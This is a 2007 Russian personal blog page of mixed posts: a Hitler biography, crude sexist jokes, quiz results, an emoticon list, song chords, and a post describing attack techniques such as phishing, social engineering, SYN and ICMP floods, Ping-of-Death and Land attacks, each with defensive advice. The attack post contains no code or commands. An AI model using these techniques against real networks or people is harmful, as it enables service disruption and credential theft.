-Музыка

 -Поиск по дневнику

Поиск сообщений в StolZZoom

 -Подписка по e-mail

 

 -Постоянные читатели

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 28.12.2006
Записей:
Комментариев:
Написано: 151

StolZ





                                                                                                      

                                                                                          Stolzzoom@inbox.ru


Гитлер-рейхсканцлер

Суббота, 10 Марта 2007 г. 22:51 + в цитатник
 (592x475, 263Kb)
Гитлер-рейхсканцлер
За время отсутствия лидера партия распалась. Гитлеру пришлось практически начинать все заново. Большую помощь оказал ему Рем, начавший восстановление штурмовых отрядов. Однако решающую роль в возрождении НСДАП сыграл Грегор Штрассер, лидер правоэкстремистских движений в Северной и Северо-Западной Германии. Приведя их в ряды НСДАП, он помог превращению партии из региональной (баварской) в общенациональную политическую силу.

Тем временем Гитлер искал поддержку на общегерманском уровне. Ему удалось завоевать доверие генералитета, а также установить контакты с промышленными магнатами. Когда парламентские выборы в 1930 году и 1932 году принесли нацистам серьезный прирост депутатских мандатов, в правящих кругах страны стали всерьез рассматривать НСДАП как возможного участника правительственных комбинаций. Была предпринята попытка отстранить Гитлера от руководства партией и сделать ставку на Штрассера. Однако Гитлеру удалось быстро изолировать своего сподвижника и близкого друга и лишить его всякого влияния в партии. В конце концов в германских верхах было принято решение предоставить Гитлеру главный административно-политический пост, окружив его (на всякий случай) опекунами из традиционных консервативных партий. 31 января 1933 года президент Гинденбург назначил Гитлера рейхсканцлером (премьер-министром Германии). [4]

Уже в первые месяцы пребывания у власти Гитлер продемонстрировал, что намерен считаться с ограничениями, от кого бы они не исходили. Использовав в качестве предлога организованный нацистами поджег здания парламента (Рейхстаг), он начал повальную «унификацию» Германии. Были запрещены сначала коммунистическая, а затем социал-демократическая партии. Ряд партий вынуждены были самораспуститься. Были ликвидированы профсоюзы, имущество которых передано нацистскому рабочему фронту. Противники новой власти без суда и следствия отправлялись в концентрационные лагеря. Начались массовые преследования «инородцев», кульминацией которых спустя несколько лет стала операция «эндлёзунг» (окончательное решение), направленная на физическое уничтожение всего еврейского населения. Не избежали репрессий и личные (реальные и потенциальные) соперники Гитлера в партии (и вне ее). 30 июня он принял личное участие в уничтожении вожаков СА, которые были заподозрены в нелояльности фюреру. Первой жертвой этой расправы стал давний соратник Гитлера Рем. Были физически уничтожены Штрассер, фон Кар, бывший рейхсканцлер генерал Шлейхер и другие деятели. Гитлер приобрел над Германией абсолютную власть.[5]


1939В 1936—1939 Германия под руководством Гитлера оказала существенную помощь франкистам во время Гражданской войны в Испании. В 1938 была оккупирована Австрия, затем — Чехословакия (так называемый «Мюнхенский сговор»).
 (319x319, 26Kb)


Понравилось: 12 пользователям

Без заголовка

Суббота, 10 Марта 2007 г. 22:44 + в цитатник
 (90x120, 3Kb)
 (200x510, 22Kb)
Адольф Гитлер родился в Браунау-на-Инне (Австрия) 20 апреля 1889 года (с 1933 года этот день был национальным праздником нацистской Германии). Отец будущего фюрера Алоис Гитлер был сперва сапожником, потом таможенным служащим; будучи незаконнорожденным, до 1876 года носил фамилию своей матери Шикльгрубер. Алоис имел не слишком высокий чин обер-официаля (таможeнный инспектор). Мать — Клара, урождённая Пёльцль, происходила из крестьянской семьи.

В 16 лет Гитлер окончил реальную школу в Линце, не дававшую полного среднего образования. Попытки поступить в Венскую художественную академию оказались неудачными. После смерти матери (1908) Гитлер перебрался в Вену, где жил в приютах для бездомных, перебивался случайными заработками. В этот период ему удалось продать несколько своих акварелей, что дало основания называть себя художником.

Его взгляды сложились под влиянием крайнего националиста линцского профессора Петша и известного антисемита обер-бургомистра Вены К. Люгера. Гитлер испытывал враждебность к славянам (особенно к чехам) и ненависть к евреям. Он верил в величие и особую миссию германской нации.

Без заголовка

Суббота, 03 Марта 2007 г. 18:41 + в цитатник
 (377x267, 11Kb)
 (377x286, 8Kb)
Как сделать часы из ярлыков рабочего стола Windows
Автор: Андрей Крупин
Опубликовано 24 марта 2006 года

В одном из прошлых номеров еженедельника "Компьютерра" проскочила маленькая заметка про утилиту "Настольный хронометр" от Дмитрия Кирсанова, заставляющую все ярлыки рабочего стола Windows выстраиваться в виде аналоговых часов и демонстрировать текущее время. Что ж, задумка вполне оригинальная, поэтому давайте остановимся на упомянутой программе немного подробнее, тем более, что она как раз попадает в рамки рубрики "RTFM".

Начнем наше мимолетное знакомство с упоминания тактико-технических характеристик приложения, о которых и говорить-то, в принципе, нечего. Скажем лишь, что дистрибутив "Настольного хронометра" занимает чуть меньше четверти мегабайта и включает в себя, помимо деинсталлятора, два рабочих файла - chronodesk.exe и chronoptions.exe. Первый отвечает за основной функционал программы и заставляет ярлыки крутиться по ходу времени. Этот файл является резидентным, то есть постоянно "висит" в оперативной памяти компьютера, когда часы активированы. Ну, а второй "экзешник" отвечает за управление настройками утилиты, в которых можно изменить внешний вид, размер и положение виртуального циферблата, отрегулировать длину стрелок, выровнять оставшиеся без "дела" значки и внести программу в список автозагрузки.




От наведения порядка в параметрах переходим к запуску часов, для чего в окне настроек находим вкладку "Хронометр" и нажимаем там кнопку "Включить". Все, теперь можно приглушить звук колонок, чтобы насладиться тиканьем десктопных "ходиков".




Конечно, практическая ценность такой утилиты, быть может, и сомнительна, однако, памятуя о грядущих первоапрельских розыгрышах, полагаем этакое стоит взять на заметку.
 (100x100, 37Kb)

Результат теста "Цвет твоей души...."

Среда, 28 Февраля 2007 г. 20:20 + в цитатник
Результат теста:Пройти этот тест
"Цвет твоей души...."

Красная душа

Твоя душа ни черна, и не бела...Но у тебя есть то, что отсутвует в других цветах..Страсть ..ТЫ можешь любить так, как не любит никто ...
Психологические и прикольные тесты LiveInternet.ru

КАМЕДИКЛАБ

Среда, 28 Февраля 2007 г. 11:02 + в цитатник
Сегодня я расскажу вам о том, что мы все ссука хотим получить всю жизнь, а потом хер этим пользуемся... речь пойдет о профессиях:
Официант. Официант ссука всемогущий, захочет плюнет в чай, захочет пёрнет в борщ. Официант ссука даже ночью спит слегка согнувшись, но всю ночь улыбается, потому, что ему снится та херня, которую он про вас думает.
Агроном. Агроном - это такая профессия, когда всю жизнь ссука у тебя под кроватью кукуруза и нива под жопой. Агроном всю жизнь офигевает с двух вещей: какого хрена он стал агрономом и как пьют комбайнеры. Кстати в переводе комбайн означает резаные мыши.
Футболист. Футболист ссука ну куда ты, ну еп твою, ну... Футболисты бывают хорошие и наши. Хорошие - это иностранные футболисты. Разница между иностранными и нашими футболистами знаете какая, нет? Догадываетесь? (говорят болельщицы) У иностранных футболистов красивые жены, а у наших - бутсы.
Пекарь. Пекарь ссука веселый, потому что каждое утро делает плюшки и не только себе, а всей стране.
Инженер. Инженер ссука в жопе инженер. Инженер - это человек с большой писькой и маленькой зарплатой. Писька у инженера большая, потому что он ссука всю жизнь смотрит на нее через очки. Одним словом инженер - это человек у которого всю жизнь карандаш за ухом и ни хера за пазухой.
Сторож. Сторож ссука одинокий. Сторож - это такая профессия, когда всю жизнь читаешь огонек за 78 год ссышь на склад, пьешь (...непонятно...), трахаешь шапку и спать, завтра ссука трудный день. Ученые всего мира бьются над вопросом откуда у сторожа внучка, и почему она ссука похожа на шапку.
Монтажник. Монтажник - это очень странная профессия. Монтажник - это когда все время пьешь, но все время ссука на высоте. Все монтажники пьют, особенно пьют монтажники-высотники. Но кроме этих чертей есть вообще просто ужас черти. Это монтажники-высотники да. Они пьют так, что потом с высоты вам шлют привет. Ну работа такая...
Сварщик. Сварщик ссука счастливый. Сварщик - это такая профессия, когда человек каждый день на работе думает, что Новый Год. А какой новый год без маскарада? Поэтому сварщик ссука все время в маске, и она ему портит жизнь. Сварщик все время думает, что у всех рожи фиолетовые. Но есть ссука газосварщик. Это очень богатый сварщик. все знают, сколько можно наварить на газе да? Можно наварить столько, что сын никогда не станет сварщиком.
Фотограф. Фотограф ссука странный. Фотограф на работе фотографирует сиськи и жопы, а на отдыхе - жаб и небо. Первые фотографи были очень бедными, поэтому накрывались черной тряпкой и так жили. Зимой было холодно и они грелись вспышками. Водки тогда было много, но денег на водку у фотографов не было, поэтому однажды они пропитали бензином свои тряпки, так ссука появились цветные фотографии.
Такая профессия - Стилист.
Стилист - это человек, который за твои деньги пойдет с тобой в магазин, чтоб посоветовать тебе за твои деньги купить тебе то, что он очень хотел бы себе.
Парикмахер. Парикмахер - это стилист-натурал. Поэтому парикмахер сука бедный.
Кассир. Кассир - мазохист. Целый день молотит сидит по пузу шкатулкой с деньгами.
Аптекарь. Аптекарь ссука крутой. Аптекарь крутой, потому что он может прочитать любую херню... любую херню, которую написал доктор, поэтому аптекарь круче доктора, потому что он может не только прочитать любую херню, но помнит где она стоит, и лично определяет когда, как, сколько, в голову или в жопу, жрать перед этим или нет. Но аптекари, как и хоккеисты - это люди, которые все время смотрят на других людей через стекло. Вообще аптекарь - это такая профессия, когда бабка 2 часа рассказывает почему у нее болит грудь в районе колена, а ты стоишь ссука и спишь. Такая профессия.
Садовник. Садовник ссука в саду. И это главное. Потому что в переводе садовник с французского са- до- мо- ... означает: "петрушит чужую жену в кустах петрушки" Ну ссука профессия такая. Так что не заводите садовников, пейте, как монтажники, а вообще помните: люди, которые работают по специальности живут дольше, но ссука хуже.
Живите долго, счастливо и богато!!

Если у Вас был неудачный день и Вам кажется, что Вы ненавидите свою работу, попробуйт

Понедельник, 26 Февраля 2007 г. 01:04 + в цитатник
1. По дороге домой остановитесь рядом с аптекой и зайдите в отдел, где торгуют термометрами;
2. Купите ректальный (анальный) термометр "Джонсон и Джонсон". Только не ошибитесь, Вам нужен термометр именно этой марки;
3. Когда приедете домой, заприте двери, задвиньте шторы и отключите
телефон, чтобы ничто не потревожило Вас во время сеанса терапии;
4. Оденьте самую удобную одежду, например спортивный костюм, и ложитесь на кровать;
5. Откройте упаковку и достаньте термометр. Аккуратно положите его на прикроватную тумбочку так, чтобы он не разбился;
6. Достаньте инструкцию, которая прилагается к термометру, и прочтите ее.
Обратите внимание на предложение, напечатанное мелким шрифтом: "Каждый ректальный (анальный) термометр, изготовленный Джонсон и Джонсон, проверен индивидуально"
Теперь закройте глаза и тихо повторите пятьдесят раз: "Я так рад, что не работаю в отделе контроля качества компании Джонсон и Джонсон"!"



Процитировано 1 раз

ЧТО БЫЛО БЫ, БУДЬ МУЖЧИНЫ АБСОЛЮТНЫМИ ХОЗЯЕВАМИ ЖИЗНИ?

Понедельник, 26 Февраля 2007 г. 01:01 + в цитатник
- Восьмое марта перенесли бы на двадцать девятое февраля. Раз в четыре года это еще можно вынести.

- Галстук можно было бы не завязывать. А ширинку не застегивать.

- Пластическая операция по увеличению женской груди входила бы в программу бесплатного медицинского страхования.

- Всех женщин звали бы одинаково - для простоты в общении.

- У всех женщин была бы аллергия на золото, драгоценные камни и меха животных.

- В женских носах стояли бы специальные фильтры, заглушающие запахи пива, пота и лука.

- Тиранозавров вывели бы заново - чтобы в жизни было больше приключений.

- На работе парень, который лучше всех играет в Quake, автоматически становился бы начальником.

- Кошек разрешено было бы держать только в двух местах: холодильниках китайских ресторанов и в тирах - в качестве мишеней.

- Каждый телефонный аппарат был бы снабжен устройством, прерывающим связь через тридцать секунд разговора.

- Салфетки так и остались бы неизобретенными. Галоши тоже.

- Пристальный взгляд на женский бюст при первой встрече расценивался бы как официальное признание в любви.

- За проезд в левом ряду со скоростью шестьдесят километров в час расстреливали бы на месте.

- Чтобы расстегнуть застежку бюстгальтера, достаточно было бы легко на нее дунуть.

- После очередного этапа гонок "Формулы-1" любой желающий мог бы порулить болидом победителя.

- Выдав дочь замуж, мать автоматически забывала бы о ее существовании. Таким образом проблема тещ была бы решена окончательно. - Вместо "пивного живота" росли бы "пивные мышцы".

- Переворачивание пинком столика с нардами, шашками или монополией автоматически означало бы твою победу.

- В начале передачи новостей дикторы рассказывали бы все свежие матерные анекдоты.

- Были бы изобретены носки, которые всегда существовали бы только попарно. Оставленные тобой в разных местах, они энергично подползали бы друг к другу.

- Купальник-бикини считался бы идеальным костюмом для бизнес-леди. И не бизнес тоже.

- Сиденья на унитазах откидывалась бы вверх сразу после того, как с них вставали.

- В каждом баре стояли бы раскладушки для тех, кто не собирается сегодня отсюда уходить.

- Мусорные пакеты покидали бы дом самостоятельно. По ним достаточно было бы хорошенько наподдать ногой.

- Месячные у женщин были бы один раз в год. Во время открытия рыболовного сезона.

- Никто не относился бы ни к чему слишком серьезно.

Зарплата

Понедельник, 26 Февраля 2007 г. 00:51 + в цитатник
В ответ на просьбу о повышении зарплаты - ответ руководства компании:
Дорогой коллега!
Мы напоминаем Вам о некоторых моментах, которые Вы не упомянули в своей просьбе.
Например, напоминаем Вам, что Вы не работаете вообще.
В году 365 дней.
Вы спите 8 часов в день, то есть 122 дня.
Остается 243 дня.
У Вас есть в среднем 7 часов свободного времени в день, то есть 106 дней.
Остается 137 дней.
В году 52 воскресенья.
Остается 85 дней.
Так как Вы не работаете еще и в субботу, вычитаем еще 52 дня.
Остается 33 дня.
Также вычтите 3 недели ежегодного отпуска, т. е. еще 21 день.
Остается 12 дней.
В году 11 праздничных дней.
Остается единственный день на работу, а так как Вы именно в этот день болеете, то. ..

Этот счет является историческим документом, найденным в кладовой монастыря под Ленинг

Понедельник, 26 Февраля 2007 г. 00:32 + в цитатник
Один маляр был приглашен на работу в церковь для обновления росписи икон и купола храма монастыря. После выполнения работ настоятель монастыря предложил маляру написать счет за проделанную работу. Последний, не будучи знаком с тонкостями бухгалтерии, написал счет следующий:

1. Увеличил небо с прибавлением звезд - 1 руб.
2. Раскрасил место рождения Христа - 1 руб.
3. Поправил одежду Адама и Евы после искушения - 1 руб.
4. Промыл мудрую деву и потом покрыл ее два раза - 1 руб.
5. Отделал Варвару у входа - 10 руб.
6. Деве Марии сделал нового младенца - 10 руб.
7. Поправил ангела и вставил перо святому духу - 11 руб.
8. Отделал по 1 разу жен-мироносцев - 13 руб.
9. Покрыл три раза святую Магдалину - 8 руб.
10. Отодрал у святого Николая одно место и приставил новое - 7 руб.
11. Разделил облака и туманы, и поставил крест над всеми
святыми -18 руб.
81 руб. получил сполна. Подпись: маляр Иванов А.А.

На счете имелась следующая резолюция:
'Выдашь счет этому дураку, иначе он всех святых перепортит'
Настоятель монастыря Евлампий и Святой.

Скоро праздник

Понедельник, 19 Февраля 2007 г. 13:43 + в цитатник
 (320x367, 31Kb)
С праздником Вас дорогие девушки!!!!

Жизнь

Понедельник, 19 Февраля 2007 г. 13:39 + в цитатник
Это....
 (621x316, 10Kb)

Афганистан

Пятница, 16 Февраля 2007 г. 10:00 + в цитатник
 (441x294, 18Kb)
Am Dm
Афганистан и по тревоге мы встаем,
G C E
Взяв автомат, садимся молча в самолет,
Am Dm
В рассветный час, когда земля еще спала,
E Am
В Афганистан приказа воля занесла.Припев:
Am Dm
Афганистан, красивый, дикий горный край,
G C E
Приказ простой - вставай иди и умирай.
Am Dm
Ну как же так, ведь нам дворе весна давно,
E Am
А сердце наше любви и горечи полна.
Афганистан, грохочет где-то пулемет,
Афганистан, вчера погиб мальчишек взвод.
И командир с свинцом в груди на землю пал,
- Россия, Мать он перед смертью прокричал.
Припев:
Мой друг упал, лицо красивое в крови,
Он умирал в дали от родины земли.
Последний раз смотрел в чужие небеса
Он мне сказал: "Свободным будь Афганистан!(Прекрасен наш Афганистан)".
Припев:
"Кто молод был, тот за минуту постарел"
-Сказал отец, когда на сына посмотрел.
Все тот же он, лишь с сединою на висках
Тоска и грусть в его, как шар земной глазах.

 (114x249, 6Kb)

Результат теста "Как ты прожигаешь свою молодость?"

Среда, 14 Февраля 2007 г. 12:50 + в цитатник
 (169x169, 49Kb)  (71x107, 1Kb)  (70x70, 4Kb)
Результат теста:Пройти этот тест
"Как ты прожигаешь свою молодость?"

тебя все любят,и ты их тоже!

Тебе по жизни везет,к тебе тянутся люди,ты успеваешь везде,и там где ты-ооочень весело...=)при этом успеваемость не очень хромает!Ты точно классно проводишь время!
Психологические и прикольные тесты LiveInternet.ru

Жертвы во имя любви

Суббота, 10 Февраля 2007 г. 00:16 + в цитатник
liveinternet.ru/users/stolzzoom/profile/ Жертвы во имя любви
Любовь, как известно, требует жертв. Допустим. Но если в начале отношений эти жертвы принимаются с благодарностью и оцениваются по достоинству, то согласно закону «к хорошему привыкают быстро» потом могут стать вашей прямой обязанност

Метки:  

Результат теста "Ты умный или ОЧЕНЬ умный? (тест для эрудитов)"

Пятница, 09 Февраля 2007 г. 14:30 + в цитатник
 (45x60, 3Kb)  (45x60, 3Kb)  (45x60, 3Kb)
Результат теста:Пройти этот тест
"Ты умный или ОЧЕНЬ умный? (тест для эрудитов)"

4

Кое-какой эрудицией ты обладаешь. Молодец! Так держать! :)))
Психологические и прикольные тесты LiveInternet.ru

Смайлики

Пятница, 09 Февраля 2007 г. 13:39 + в цитатник
 (50x50, 4Kb)
 (23x46, 2Kb)
 (140x104, 18Kb)
 (56x65, 0Kb)
 (169x169, 49Kb)





Описание смайликов:


:-) Оcновная улыбка.

;-) Улыбка c подмигиванием.

:-( Хмурая физиономия.

:-I Индифферентная физиономия.

:-> Саркаcтичеcкая физиономия.

>:-> Саркаcтичеcкая физиономия c дьявольcким оттенком.

>;-> То же плюc подмигивание..

Изменения рта:

:-[ Вампир.

:-E Клыкаcтый вампир.

:-F Он же c обломанным клыком.

:-7 Кривая улыбка.

:-* Угрюмый.

:-@ Орущий.

:-# Носящий скобки

:-& Лишившийcя дара речи; cмутившийcя; коcноязычный.

:-Q Курящий.

:-? Курящий трубку.

:-P Выcовывающий язык.

:-S Непоcледовательный, беccвязный.

:-D Громко ржущий.

:-X Рот на замке.

:-C Лодырь.

:-/ Скептик.

:-o Ох-ох.

:-9 Облизывающий губы.

:-0 Не ори! Также оратор.

:-` Сплевывающий (табак).

:-1 Normal.

:-! Normal.

:-$ Рот cкреплен проволокой?

:-% Банкир.

:-q Пытающийcя доcтать языком до ноcа.

:-a Тоже cамое, но c другой cтороны.

:-e Разочарованный.

:-t Злой, раздраженный.

:-i Полуулыбка.

:-] Болван.

:-[ Неулыбающийcя болван.

:-} Потреcкавшиеcя губы или ухмылка (борода?)

:-{ Уcатый.

:-j Левая улыбка.

:-d Левая улыбка насмешка над читающим.

:-k Это меня убивает.

:-\ Нерешившийcя.

:-| Дежурная улыбка.

:-< Печальный.

:-x Рот на замке.

:-c Ленивая.

:-v Говорящая голова?

:-b Выcунувший язык.

Изменения ноcа:

:*) Пьяный.

:^) Со cломанным ноcом.

:v) То же, но в другую cторону.

:_) Ноc cоcкользнул c его/ее лица.

:< ) From an Ivy League school.

:=) Два ноcа.

:o) Клоун.

:u) Забавно выглядящий ноc (left).

:n) Забавно выглядящий ноc (right).

Изменения в глазах:

%-) Очень долго таращившийcя на экран.

8-) Ноcящий cолнечные очки.

B-) Ноcящий очки (could be horn-rims).

O-) Циклоп или одевший маcку для ныряния.

..-) Одноглазый.

,-) Подмигивающий одноглазый.

g-) Ноcящий пенcне (монокль?)

Изменения более чем в одном cимволе:

|-I Спящий.

|-O Зевающий.

%-6 Мозги cпеклиcь.

|^o Храпящий?

:,( Плачущий, но без ноcа.

8-| Вcтревоженный.

Добавление cимволов:

::-) Ноcящий очки (четырехглазый).

B:-) Очки подняты на голову.

8:-) Маленькая девочка.

:-)-8 Взроcлая девочка.

:-{) Уcатый.

:-#) Куcтиcтые уcы.

{:-) Ноcящий парик.

}:-) Парик дыбом.

:-)~ Валяющий дурака.

:-~) Замерзший.

:'-) Плачущий от cчаcтья.

=:-) Гладкоголовый.

-:-) Панк.

+-:-) Папа Римcкий.

`:-) Голова выбрита c одной cтороны.

,:-) То же c другой cтороны.

O :-) Ангел.

C=:-) Шеф.

*<:-) В шапочке Санта Клауcа.

E-:-) Ham radio operator.

8 :-) Колдун.

@:-) Ноcящий тюрбан.

[:-) В наушниках.

:-)) Двойной подбородок.

>:-) Дьявол.

(:-) Большая улыбка.

+:-) Священник.

:-)X Ноcящий галcтук-бант.

Миниатюры:

:) Standard.

:] Веселый.

:@ Вопящий.

:D Ржущий.

:I Думающий.

:( Опечаленный.

:[ Лодырь.

:O Громко говорящий.

:Q Курящий.
 (60x44, 23Kb)

Аудио-запись: Серый волк

Среда, 07 Февраля 2007 г. 08:47 + в цитатник
Прослушать Остановить
884 слушали
9 копий

[+ в свой плеер]

 (50x130, 19Kb)
 (50x130, 19Kb)
 (50x130, 19Kb)

 (50x130, 19Kb)
 (50x130, 19Kb)
Классная песенка.
 (50x130, 19Kb)

Аудио-запись: Кошка

Музыка

Вторник, 06 Февраля 2007 г. 19:30 (ссылка) +поставить ссылку

Комментарии (0)Комментировать

www.ASMarket.ru

Понедельник, 05 Февраля 2007 г. 14:55 + в цитатник

Видео-запись: Сектор газа+Михаил Круг

Понедельник, 05 Февраля 2007 г. 10:36 + в цитатник
Просмотреть видео
496 просмотров

 (150x109, 3Kb)  (71x107, 1Kb)  (100x100, 5Kb)

                                                                                                                                                                            Взял вину на себя.


Метки:  

Приемы взлома

Понедельник, 05 Февраля 2007 г. 10:20 + в цитатник
 (100x100, 78Kb)

                                                                         Приемы взлома

1)      Fishing (или Фишинг). Очень широкое понятие. Смысл его в том, чтобы получить от пользователей информацию (пароли, номера кредитных карт и т.п.) или деньги. Этот приём направлен не на одного пользователя, а на многих. Например, письма якобы от службы технической поддержки рассылаются всем известным клиентам какого-либо банка. В письмах обычно содержится просьба выслать пароль к учётной записи, якобы из-за проведения каких-либо технических работ. Несмотря на то, что пользователей предупреждают, что никакую подобную информацию от них никто из работников не может потребовать, и эта информация не должна разглашаться, всегда находятся те, кто с удовольствием «дарит» свои номера, пароли и прочее. Подобные письма, обычно очень правдоподобно и грамотно составлены, что, возможно, подкупает доверчивых пользователей. Нужно оговориться, что приёмов для фишинга есть несколько, помимо писем. Некоторые из нижеприведённых приёмов при правильном применении подходят для фишинга (как правило, мы упоминаем об этом при описании приёма).

Рекомендации: Помните, что паранойя – лучшая защита. Не доверяйте ничему подозрительному, никому не давайте свои данные. Администраторам не нужно знать Ваш пароль, если он предназначен для доступа к их серверу. Они полностью управляют сервером  и могут сами посмотреть пароль или изменить его.

2)      Социальная инженерия – это не технический, а психологический приём. Пользуясь данными, полученными при инвентаризации, взломщик может позвонить какому-либо пользователю (например, корпоративной сети) от имени администратора и попытаться узнать у него, например, пароль. Это становится возможным, когда в больших сетях, пользователи не знают всех работников, и тем более не всегда могут точно узнать их по телефону. Кроме этого, используются сложные психологические приёмы, поэтому шанс на успех сильно возрастает.

Рекомендации: те же самые. Если действительно есть необходимость, то сообщите нужные данные лично. В том случае, если Вы записали пароль на бумаге, не оставляйте её где попало и по возможности уничтожайте, а не просто выбрасывайте в мусорную корзину.

3)      Вирусы. Самая известная простому пользователю проблема. Суть во внедрении вредоносной программы в компьютер пользователя.  Последствия могут быть различны и зависят от вида вируса, которым заражён компьютер. Но в целом - от похищения информации до рассылки спама, организации DDoS атак, а так же получения полного контроля над компьютером. Помимо прикрепленного к письму файла, вирусы могут попасть в компьютер через некоторые уязвимости ОС, которые описываются в нашей статье «Рейтинг уязвимостей Windows». Вирусов существует огромное множество, но всё же возможно их классифицировать. Мы не хотим изобретать заново велосипед, поэтому можно воспользоваться информацией этой страницы http://school8.uriit.ru/people/av/class.html где приводится классификация вирусов с описанием. Чуть более подробно эта тема раскрывается здесь http://fivt.krgtu.ru/kafedri/mo/site/ANTIVIRUS/pages/02.htm

Рекомендации: Пользуйтесь антивирусным ПО. Не ограничивайтесь только DrWEB или Kaspersky Anti-Virus (потому как они не проверяют реестр), используйте специализированные антивирусы против Malware, например Ad-Aware, SpyBot, XSpy. А так же не открывайте подозрительных вложений и вообще не отрывайте программ от неизвестных отправителей. Даже если отправитель Вам знаком, всё равно сначала проверьте антивирусом. Здесь как в медицине, легче избежать, чем потом вылечить.

4)      DoS (Denial of Service или Отказ от Обслуживания). Мы бы хотели сказать, что это скорее не отдельная атака, а результат атаки; используется для вывода системы или отдельных программ из строя. Для этого взломщик особым образом формирует запрос к какой-либо программе, после чего она перестаёт функционировать. Требуется перезарузка, чтобы вернуть рабочее состояние программы. Часто встречается мнение, что DoS, это то же самое, что и атака типа Flood и что вообще нужно соединить все атаки, которые приводят к отказу системы под общим названием DoS. Здесь стоит оговориться, что:


a)      Общей терминологии нет, есть скорее негласные правила, по которым классифицируется атака, поэтому даже в рамках данной статьи мы приведём, в чем-то расхожую классификацию.
b)      Как мы уже сказали, к отказу от обслуживания может привести не только Flood, но, например и Buffer Overflow.

Поэтому, DoS можно охарактеризовать как результат атаки. Например: «эффект отказа от обслуживания достигнут применением атаки типа Flood».

5)      Flood (Флуд или Поток/Затопление). Этот тип достаточно спорный, отчасти его можно отнести к DoS, но мы хотели бы выделить его отдельно. С некоторого количества машин (в этом случае атака будет называться DDoS Distributed Denial of Service. Распределенная атака на отказ от обслуживания), как правило «Зомби» посылают жертве максимально возможное количество запросов (например, запросы на соединение). От этого жертва не успевает отвечать на каждый запрос, и в итоге не отвечает на пользовательские запросы, т.е. можно сказать, что перестаёт нормально функционировать. Примечание: этот тип атаки можно назвать хулиганством, когда, например, форумы заполняют большим количеством бессмысленных сообщений. Можно выделить следующие типы Flood:


a)      SYN Flood – Затопление атакуемого компьютера пакетами типа SYN. Как известно, компьютер должен на такой пакет ответить пакетом типа SYN/ACK. Если пакетов SYN слишком много, то компьютер не успевает отвечать на каждый и не может принимать пакеты от других компьютеров.
b)      ICMP Flood или Ping Flood – То же самое, только пакетами ICMP. Система должна ответить на такой пакет, тем самым создаётся большое количество пакетов, которые снижают производительность (пропускную способность) канала.
c)      Identification Flood (Ident Flood). Похожа на ICMP Flood, но ответ на запрос на порт 113 типа identd занимает у системы больше времени, поэтому атака более эффективна.
d)      DNS Flood – атака направлена на DNS сервера. Их наводняют DNS запросы, на которые сервер не успевает отвечать, таким образом, на Ваши запросы он так же ответить не сможет. Как следствие, Вы не сможет посещать Интернет сайты.
e)      DDoS DNS – Атака достаточно новая, и мы не встречали «устоявшегося» названия. По сути, этот приём примерно то же самое, что и предыдущий, с той лишь разницей, что запросы поступают с большого количества машин (предыдущий тип этого не исключает). Адрес, по которому должен ответить DNS-сервер на эти запросы, равен адресу самого DNS сервера, т.е. его не только наводняют запросы DNS, но он же ещё и отправляет их себе же. Таким образом, приём более эффективен, чем предыдущий, но и более сложен в реализации.
f)        Boink (Bonk, Teardrop) – Жертве посылается огромное количество сильно фрагментированных пакетов, но при этом фрагменты большого размера. Для каждого фрагментированного пакета выделяется специальный буфер, в который в последствии будут помещены другие фрагменты, чтобы потом сложить их воедино. Огромное количество больших фрагментов переполняют буфера и могут спровоцировать зависание или аварийную остановку.
g)      Pong – то же самое, что и любой другой из вышеперечисленных видов, отличие только в том, что адрес отправителя поддельный. Это даёт взломщику некоторую анонимность.

Рекомендации: для каждой ОС или маршрутизатора свои; они, как правило, даны в технической документации. Не пренебрегайте ими, чётко ограничивайте количество допустимых пакетов. К сожалению, некоторые виды невозможно отразить ничем, кроме физического отключения. Правильно настроенные межсетевые экраны (или Брандмауэры) часто являются панацеей.

6)      Smurf (атака, направленная на ошибки реализации TCP-IP протокола). Сейчас этот вид атаки считается экзотикой, однако раньше, когда TCP-IP протокол был достаточно новым, в нём содержалось некоторое количество ошибок, которые позволяли, например, подменять IP адреса. Однако, этот тип атаки применяется до сих пор. Некоторые специалисты выделяют TCP Smurf, UDP Smurf, ICMP Smurf. Конечно, такое деление основано на типе пакетов.

Рекомендации: коммутаторы CISCO предоставляют хорошую защиту, как и многие другие, а также свежее ПО и межсетевые экраны; необходимо блокировать широковещательные запросы.

7)      Ping-of-Death (или Jolt, SSPing) – Атака заключается в том, что жертве посылается фрагментированный ICMP пакет, но размер фрагмента очень большой (64кБ). Старые версии ОС, например Windows 95, повисают. Эту атаку можно осуществить с помощью программы Shadow Security Scanner.

Рекомендации: легче всего обновить ОС, отказавшись от старой версии.

8)      UDP Storm (UDP шторм) – используется в том случае, если на жертве открыто как минимум два UDP порта, каждый из которых отсылает отправителю какой-нибудь ответ. Например, порт 37 с сервером time на запрос отправляет текущую дату и время. Взломщик отправляет UDP пакет на один из портов жертвы, но в качестве отправителя указывает адрес жертвы и второй открытый UDP порт жертвы. Тогда порты начинают бесконечно отвечать друг другу, что снижает производительность. Шторм прекратится, как только один из пакетов пропадёт (например, из-за перегрузки ресурсов).

Рекомендации: по возможности исключить использование сервисов, которые принимают UDP пакеты, либо отрезать их от внешней сети межсетевым экраном.

9)      UDP Bomb – взломщик отправляет системе UDP пакет с некорректными полями служебных данных. Данные могут быть нарушены как угодно (например, некорректная длина полей, структура). Это может привести к аварийному завершению.

Рекомендации: обновите ПО.

10)  Land – жертве посылается пакет на определённый порт, но адрес отправителя устанавливается тот же самый, что и жертвы, а порт отправителя равен порту получателя. (пример: получатель: 1.1.1.1 порт 111 отправитель: 1.1.1.1 порт 111). Жертва пытается установить соединение с собой, отчего может произойти повисание системы. Подобная атака также может быть на 100% эффективна против некоторых маршрутизаторов.

11)  Mail Bombing («Почтовая бомбёжка»). Если на атакуемом компьютере есть почтовый сервер, то на него посылается огромное количество почтовых сообщений с целью вывода его из строя. С одной стороны, это напоминает Flood, но с другой стороны, если сообщения содержат большие вложения, которые будут проверяться серверным антивирусом, то подобная проверка множества входящих вложений может существенно снизить производительность или свести её на нет. Кроме того, такие сообщения сохраняются на жёстком диске сервера и могут переполнить его, что может вызвать DoS. Конечно, сейчас эта атака, скорее история, но в некоторых случаях всё же может быть использована.

Рекомендации: грамотная настройка почтового сервера.

